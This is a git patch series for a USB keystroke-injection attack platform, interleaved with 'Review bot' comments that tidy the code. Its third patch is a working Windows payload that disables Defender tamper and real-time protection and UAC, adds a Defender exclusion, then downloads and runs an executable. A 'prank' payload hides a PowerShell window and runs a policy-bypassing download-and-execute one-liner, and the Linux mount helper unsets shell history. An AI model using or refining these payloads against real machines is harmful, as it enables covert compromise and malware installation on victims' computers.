From 858bb2df2c4b03dde8b2a244138af6cc607d2fad Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Sat, 17 Dec 2022 00:22:57 +0530
Subject: [PATCH 1/4] uploading LINUX_MOUNT extension (#570)

* uploading LINUX_MOUNT extension
* uploading LINUX_MOUNT_DEMO
* decreasing delay time
* removed delays
---
 payloads/extensions/linux_mount.sh | 30 +++++++++++++++++++
 .../general/LINUX_MOUNT_DEMO/payload.txt | 27 +++++++++++++++++
 2 files changed, 57 insertions(+)
 create mode 100644 payloads/extensions/linux_mount.sh
 create mode 100644 payloads/library/general/LINUX_MOUNT_DEMO/payload.txt

diff --git a/payloads/extensions/linux_mount.sh b/payloads/extensions/linux_mount.sh
new file mode 100644
index 00000000..46b06c3f
--- /dev/null
+++ b/payloads/extensions/linux_mount.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+#
+# LINUX_MOUNT v1 by @drapl0n
+# Auto mounts BashBunny on GNU/Linux systems.
+# NOTE: Mount path is stored in variable "lmnt".
+# Usage: LINUX_MOUNT - to automatically mount BashBunny.
+# LINUX_UMOUNT - to unmount mounted BashBunny.
+
+function LINUX_MOUNT() {
+ Q CTRL-ALT t
+ Q DELAY 1000
+ Q STRING unset HISTFILE
+ Q ENTER
+ Q DELAY 200
+ Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+ Q ENTER
+ Q DELAY 200
+ Q STRING udisksctl mount -b /dev/'$disk'
+ Q ENTER
+ Q DELAY 2000
+ Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+ Q ENTER
+ Q DELAY 500
+}
+function LINUX_UMOUNT() {
+ Q STRING udisksctl unmount -b /dev/'$disk'
+ Q ENTER
+ Q DELAY 1000
+}
+export -f LINUX_MOUNT LINUX_UMOUNT
diff --git a/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt b/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt
new file mode 100644
index 00000000..b2f7fcff
--- /dev/null
+++ b/payloads/library/general/LINUX_MOUNT_DEMO/payload.txt
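Review bot: The `lmnt=` line runs `lsblk | grep $disk`, which is a substring match over every row, so when the device name is a prefix of another entry more than one row comes back and `awk '{print $7}'` can read the mount point off the wrong one (or an empty column on a parent device). Querying the device itself avoids the grep: `Q STRING lmnt='$(lsblk -rno MOUNTPOINT /dev/$disk)'`, where the single quotes keep the `$(...)` and `$disk` expansions on the target side as the existing lines do. The label `BashBunny` is hard-coded in the `disk=` line even though patch 2 of this series adds `GET BB_LABEL` for exactly that value. `LINUX_UMOUNT` silently relies on `$disk` still being set in the same target shell that ran `LINUX_MOUNT`; the header should say so, e.g. `# NOTE: LINUX_UMOUNT must run in the same terminal session as LINUX_MOUNT (it reuses $disk).`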
@@ -0,0 +1,27 @@ +# Title: LINUX_MOUNT_DEMO +# Description: LINUX_MOUNT is an extension to automatically mount/unmount BashBunny on GNU/Linux systems. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Genral +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +ATTACKMODE STORAGE HID +LED SETUP + +# LINUX_MOUNT automatically mounts BashBunny. +LINUX_MOUNT + +# NOTE: Mount path is stored in varialble "lmnt". +Q STRING echo Successfully mounted BashBunny at '\"$lmnt\"'. +Q ENTER + +# LINUX_UMOUNT unmounts mounted BashBunny from system. +LINUX_UMOUNT + +Q STRING echo Successfully unmounted BashBunny. +Q ENTER +LED FINISH +Q DELAY 2000 +Q STRING exit +Q ENTER From d68298eaa3d1d06005324266206e2867902ba144 Mon Sep 17 00:00:00 2001 From: rsxchin <68041324+rsxchin@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:58:09 -1000 Subject: [PATCH 2/4] Add GET BB_LABEL function and docs (#569) * Add GET BUNNY_LABEL to get.sh Instead of hardcoding "BashBunny" or whatever new name the Bunny has, attackers can use a GET command. * Add docs for GET HOST_IP & GET BB_LABEL --- docs/readme.txt | 6 +++++- payloads/extensions/get.sh | 4 ++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/docs/readme.txt b/docs/readme.txt index ed0b9437..04f8598f 100644 --- a/docs/readme.txt +++ b/docs/readme.txt @@ -6,7 +6,7 @@ Bash Bunny by Hak5 USB Attack/Automation Platform - -+- QUICK REFERENCE GUIDE v1.4 -+- + -+- QUICK REFERENCE GUIDE v1.5 -+- +-----------------+ @@ -107,6 +107,8 @@ $HOST_IP IP Address of the Bash Bunny (Default: 172.16.64.1) $SWITCH_POSITION "switch1", "switch2" or "switch3" + $BB_LABEL Volume name of the BashBunny + when mounted. @@ -153,6 +155,8 @@ GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME GET HOST_IP Returns $HOST_IP GET SWITCH_POSITION Returns $SWITCH_POSITION + GET TARGET_OS Returns $TARGET_OS + GET BB_LABEL Returns $BB_LABEL diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 0ebd6e7d..791ad2c0 100755 
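Review bot: The LINUX_MOUNT_DEMO header carries typos that show up verbatim in the library listing: `# Category: Genral` should be `# Category: General`, and `# NOTE: Mount path is stored in varialble "lmnt".` should read `variable`. `# Target: Unix-like operating systems.` overstates the scope, since the extension it calls depends on `udisksctl` and `lsblk`; `# Target: GNU/Linux systems (requires udisksctl and lsblk).` would match the extension's own header comment.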
--- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -26,6 +26,10 @@ function GET() { [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; + "BB_LABEL") + export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }') + ;; + esac } From d237d080e63c2897e6e45def49ea04f8cbf0bb69 Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Fri, 16 Dec 2022 13:59:18 -0500 Subject: [PATCH 3/4] payload.txt (#567) What the payload does: # 1) Disables Tamper Protection in Windows Defender. # 2) Disables UAC / Turns UAC off # 3) Creates Payload Directory in C:/ Drive # 4) Disables Real-Time Protection in Windows Defender. # 5) Adds the Payload Directory as an exclusion in Windows Defender # 6) Downloads Payload from Specified URI (Enter in Variable Below) # 7) Runs Payload on System --- .../Windows-Payload-Injector/payload.txt | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 payloads/library/remote_access/Windows-Payload-Injector/payload.txt diff --git a/payloads/library/remote_access/Windows-Payload-Injector/payload.txt b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt new file mode 100644 index 00000000..eb7a55e5 --- /dev/null +++ b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt 
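Review bot: The new `"BB_LABEL")` case parses `ls -l` output and keeps only field `$9`, so a volume label containing a space is truncated to its first word, and `export BB_LABEL=$(...)` quietly exports an empty value when no link pointing at `nandf` exists. Iterating the by-label symlinks and checking the link target avoids the `ls` parsing; udev writes unsafe characters in these link names as `\xNN` escapes, which `printf '%b'` should decode — worth confirming against a label that contains a space. `GET()` opens outside the hunk; only its `esac` and closing brace are visible here.
```bash
    "BB_LABEL")
        BB_LABEL=
        for link in /dev/disk/by-label/*; do
            if [[ $(readlink "$link") == *nandf ]]; then
                printf -v BB_LABEL '%b' "${link##*/}"
                break
            fi
        done
        export BB_LABEL
        ;;
```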
@@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title: Microsoft Windows Payload Injector
+#
+# Description:
+# 1) Disables Tamper Protection in Windows Defender.
+# 2) Disables UAC / Turns UAC off
+# 3) Creates Payload Directory in C:/ Drive
+# 4) Disables Real-Time Protection in Windows Defender.
+# 5) Adds the Payload Directory as an exclusion in Windows Defender
+# 6) Downloads Payload from Specified URI (Enter in Variable Below)
+# 7) Runs Payload on System
+#
+# Author: KryptoKola
+# Version: 1.0
+# Category: Remote Access
+# Target: Microsoft Windows 10 & 11
+
+LED SETUP
+ATTACKMODE HID
+#Variables
+readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
+
+#Disables Tamper Protection in Windows 10 & 11
+LED STAGE1
+Q GUI s
+Q STRING "Virus & threat protection"
+Q ENTER
+Q DELAY 10000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q ENTER
+Q DELAY 1000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q SPACE
+Q DELAY 1000
+Q ALT y
+Q DELAY 1000
+Q ALT F4
+Q FN ALT F4
+
+#Starts Powershell in Admin mode
+LED STAGE2
+Q GUI r
+Q DELAY 250
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+Q DELAY 3000
+Q ALT y
+Q DELAY 5000
+
+#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
+LED STAGE3
+Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
+Q ENTER
+Q DELAY 1500
+Q ALT y
+Q DELAY 250
+
+#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
+LED STAGE4
+Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
+Q ENTER
+Q DELAY 2000
+
+#Launches the Payload on the machine
+LED STAGE5
+Q STRING ./payload.exe
+Q ENTER
+Q DELAY 250
+
+#Clears the shell and exits out.
+LED CLEANUP
+Q STRING clear
+Q ENTER
+Q DELAY 250
+Q STRING exit
+Q ENTER
+
+LED FINISH
From 2266a9ddf65599c790a9025651941bcd9995b4ee Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Fri, 16 Dec 2022 14:01:05 -0500
Subject: [PATCH 4/4] New Payload - cApS-Troll (#566)

* Add files via upload
* Add files via upload
* Add files via upload
* Update payload.txt
---
 payloads/library/prank/cApS-Troll/README.md | 105 ++++++++++++++++++
 payloads/library/prank/cApS-Troll/a.ps1 | 17 +++
 payloads/library/prank/cApS-Troll/payload.txt | 18 +++
 3 files changed, 140 insertions(+)
 create mode 100644 payloads/library/prank/cApS-Troll/README.md
 create mode 100644 payloads/library/prank/cApS-Troll/a.ps1
 create mode 100644 payloads/library/prank/cApS-Troll/payload.txt

diff --git a/payloads/library/prank/cApS-Troll/README.md b/payloads/library/prank/cApS-Troll/README.md
new file mode 100644
index 00000000..d7011865
--- /dev/null
+++ b/payloads/library/prank/cApS-Troll/README.md
@@ -0,0 +1,105 @@
+
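Review bot: The header's numbered list describes what the payload does but not what it leaves behind, and the `LED CLEANUP` stage only clears and exits the shell: after the run the host still has real-time monitoring disabled, `C:/Payloads` excluded, and `ConsentPromptBehaviorAdmin` set to 0. A library entry should state that in the header so whoever runs it under an authorized engagement knows what has to be restored on the host afterwards, e.g. `# NOTE: Leaves Defender real-time monitoring off, C:/Payloads excluded and ConsentPromptBehaviorAdmin=0 on the target; revert these after the engagement.` The hunk is the whole new file, so nothing is cut off.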

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# cApS-Troll + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Description + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Getting Started + +### Dependencies + +* Dropbox or other file sharing service +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download the file and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/cApS-Troll/a.ps1 b/payloads/library/prank/cApS-Troll/a.ps1 new file mode 100644 index 00000000..fa7129c1 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/a.ps1 @@ -0,0 +1,17 @@ +while (1){ +Start-Sleep -Second 45 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +Start-Sleep -Second 15 +$wsh = New-Object -ComObject WScript.Shell +$wsh.SendKeys('{CAPSLOCK}') +} \ No newline at end of file diff --git a/payloads/library/prank/cApS-Troll/payload.txt b/payloads/library/prank/cApS-Troll/payload.txt new file mode 100644 index 00000000..9dc8ab8f --- /dev/null +++ b/payloads/library/prank/cApS-Troll/payload.txt @@ -0,0 +1,18 @@ +REM Title: cApS-Troll + +REM Author: atomiczsec + +REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +REM Target: Windows 10 + +"URL='http://example.com/powershell.ps1?dl=1'" + +QUACK DELAY 2000 +QUACK GUI r +QUACK DELAY 500 +QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL ; iex $pl +QUACK ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download in the URL variable +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
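Review bot: `$wsh = New-Object -ComObject WScript.Shell` is repeated five times inside the `while (1){` body, creating a fresh COM object before every `SendKeys` call; move the one line above the loop and drop the four duplicates, reusing `$wsh` for each `SendKeys('{CAPSLOCK}')`. `-Second` works only because PowerShell accepts unambiguous parameter prefixes; spelling it `-Seconds` reads as intended. The loop has no exit condition, so the process keeps toggling until the host session ends, which the README's description should mention. The file also ends without a trailing newline.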
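Review bot: `REM Target: Windows 10` in payload.txt disagrees with the README, whose dependency list says `Windows 10,11`; the two should name the same targets, e.g. `REM Target: Windows 10, 11`. The closing two `REM` lines about replacing the link and changing `?dl=0` to `?dl=1` duplicate the README's "Executing program" section; keeping that guidance in one place avoids the two drifting apart.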